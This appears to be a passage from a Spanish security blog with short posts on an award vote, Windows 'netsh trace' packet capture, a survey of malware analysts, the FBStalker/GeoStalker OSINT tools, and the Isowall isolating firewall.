Gracias a vuestros votos es posible que exista una categoría específica para esta temática y que todos los que nos dedicamos a ésto estemos también orgullosos por ser un punto de interés en Internet. 

A falta de sólo unas horas para que se cierren las votaciones y sean cual sean los resultados finales, nosotros ya hemos ganado con estar ahí tan arriba al lado de muchos grandes profesionales, entusiastas y amigos. 

¡Muchas gracias!

Última Clasificación Parcial: Mejor Blog de Seguridad Informática
1. equal El Blog De Angelucho
2. up El Lado Del Mal
3. down Security By Default
4. up Hacktimes V2.0
5. down Hack Players
6. up Hacking Ético
7. down Flu Project «
8. down Hacking Ètic
9. down Blackploit [Pentest]
10. up Underc0De Blog - Hacking Ético

Netsh trace, realiza capturas de tráfico de red sin necesidad de instalar nada

En Windows 7/2008 R2 ya no es necesario instalar WireShark o Netmon para realizar una captura de tráfico, con el comando 'netsh trace' es posible hacerlo directamente desde la línea de comandos:


Básicamente desde una consola con permisos administrativos ejecutamos el comando 'netsh trace start' con los parámetros deseados para iniciar la captura:

C:\Windows\system32> netsh trace start capture=YES report=YES persistent=YES

Y posteriormente cuando queramos paramos la monitorización con el comando:

C:\Windows\system32> netsh trace stop

Una vez finalizada la captura, se generarán dos ficheros por defecto: uno con extensión .ETL (Event Trace Log) que puede ser abierto con herramientas como Netmon, y otro con extensión .CAB que contiene abundante información sobre el software y hardware del sistema, así como la información del adaptador, estructura, sistema operativo y la configuración inalámbrica.

¿Malware en la red corporativa? el jefe ha vuelto a ver porno...

En octubre de 2013 ThreatTrack Security llevó a cabo una encuesta a 200 analistas de malware de distintas empresas de EE.UU. Sus conclusiones son cuanto menos curiosas y también queríamos compartirlas con vosotros:

- casi 6 de cada 10 analistas reconocen que han investigado o tratado fugas de datos que no se han dado a conocer nunca por la empresas afectadas
- las empresas con más de 500 empleados son más propensas a haber tenido una incursión no declarada
- el 40% de los encuestados dijo que la mayor dificultad para defender la red de su organización es el hecho de que no tienen suficiente personal de seguridad altamente cualificado
- el 67% también dijo que la complejidad del malware es otro factor principal, el 67 % el volumen de los ataques de malware y el 58% citó la falta de efectividad de las soluciones anti-malware
- los analistas dedican mucho tiempo a revisar infecciones de malware fácilmente evitables que se originan en los niveles más altos de la organización y fundamentalmente debido a que:
    . visitan sitios web pornográficos (40 %)
    . hacen clic en un enlace malicioso en un correo electrónico de phishing (56 %)
    . permiten que un miembro de su familia use un dispositivo de propiedad de la empresa (45 %)
    . instalan alguna aplicación móvil maliciosa (33 %)
- más de la mitad (52 %) de todos los analistas de malware dijeron que normalmente les lleva más de 2 horas analizar una nueva muestra de malware. Por el contrario, sólo el 4 % dijo que son capaces de analizar un nuevo ejemplar de malware en menos de una hora
- un 35 % comenta que no tienen acceso a una solución automatizada de análisis de malware
- por último también se les preguntó a los analistas sobre el espionaje cibernético. El 37 % de los encuestados dijo que los EE.UU. es el país más experto en la realización de espionaje cibernético, seguido de cerca por China con un 33 %


¿Y vosotros que opináis? Real como la vida misma ¿verdad?

Fuente: Malware Analysts Say Breaches Are Not Being Disclosed by Their Employers

FBStalker y GeoStalker, dos herramientas para analizar tu vida privada

Yo sé qué si estáis leyendo esta entrada en este blog teneis en especial consideración la seguridad informática y sois extremadamente cuidadosos con la configuración de la privacidad de vuestras cuentas como la de Facebook... 

...pero has de saber que sólo necesitas tener un amigo "descuidado" para abrir el camino hacia una gran cantidad de información sobre tu vida privada. 

Con FBStalker y GeoStalker, herramientas de inteligencia de código abierto (OSINT) para minería de datos, se facilita mucho este proceso y, como comentamos, es posible aprovecharse de uno sólo de tus amigos imprudentes para conseguir tener mucha información sensible y un auténtico esquema de tu vida personal.

Estas herramientas fueron presentadas (pdf) por Keith Lee y Jonathan Werrett de SpidersLabs en la última conferencia Hack in the Box en Kuala Lumpur. Ambos demostraron cómo utilizar Facebook Graph con otras fuentes como LinkedIn, Flickr, Instagram y Twitter para recolectar información sobre una objetivo, como lugares y sitios web visitados con regularidad, el trabajo, la escuela o los amigos on-line y mostrar los datos en Google Maps.


Isowall: un mini-firewall con su propia pila TCP/IP

Durante su investigación de #badBIOS, Dragos Ruiu preguntaba acerca de un firewall sencillo que fuera capaz de aislar totalmente de su red local un equipo infectado o en cuarentena pero manteniendo a la vez el acceso a Internet. Robert David Graham, otro monstruo en esto de la seguridad informática, no tardó en responderle con la creación de Isowall...

Los firewalls de hoy fallan debido a que son extensiones de la pila de red existente del sistema operativo. Esto facilita una mayor superficie de ataque y una mayor complejidad. Isowall es un mini-firewall que basa la garantía total de la seguridad en el hecho de que no hay ninguna pila TCP/IP enlazada al interfaz de red conectado al equipo infectado, lo que significa que Isowall tiene su propio TCP/IP.

Veamos la PoC. Se ejecuta Isowall en una Raspberry Pi. El portátil en la imagen puede estar infectado con un virus. Queremos que el portátil siga teniendo acceso a Internet, pero que no acceda la red local, ya que podría propagar la infección. Como se puede ver, el portátil tiene una conexión Ethernet directa a la Raspberry Pi corriendo isowall (cables azul y blanco conectados al adaptador Ethernet USB), que luego se une al resto de la red doméstica (cable gris):



Al ejecutar ifconfig en la Raspberry Pi se puede observar que el interfaz eth1 no tiene asignado ninguna IP:



La máquina infectada puede atacar a este puerto Ethernet todo lo que quiera, no llegará a ninguna parte, porque no hay nada escuchando en ese puerto ¡excepto Isowall!

Puedes encontrar más detalles, instrucciones de instalación y uso en la web del proyecto: https://github.com/robertdavidgraham/isowall
Fuente: isowall: an isolating firewall